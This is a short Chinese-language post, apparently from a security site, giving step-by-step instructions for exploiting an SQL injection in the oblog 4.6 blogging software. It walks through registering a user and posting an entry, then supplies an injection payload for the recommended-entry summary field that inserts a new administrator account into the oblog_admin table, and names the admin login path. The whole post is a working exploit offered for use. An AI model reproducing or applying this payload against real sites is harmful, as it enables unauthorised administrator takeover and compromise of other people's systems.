oblog4.6添加后台管理员漏洞(仅适用于sql版)

韩小末

1、注册一个用户，用户名script，密码123456
2、发布一篇日志，日志标题：测试一下
3、个人前台首页找到日志"测试一下"，点"推荐"
4、个人后台管理，选择"常用"选项中的"推荐日志"，然后点"测试一下"日志后面的修改，把摘要内容修改成：s'/**/WHERE/** /logid=1;insert/**/into/**/oblog_admin/**/(username,password,roleid)values('script','49ba59abbe56e057',0);--
5、最后点"确认提交"按钮，如果提示修改成功，注入完成！
6、登录后台，地址/admin/admin_login.asp，输入上面的用户名和密码，登录后台成功！

转载请著明来源于0x54.com

pS:漏洞利用很简单~只能说程序员太疏忽了~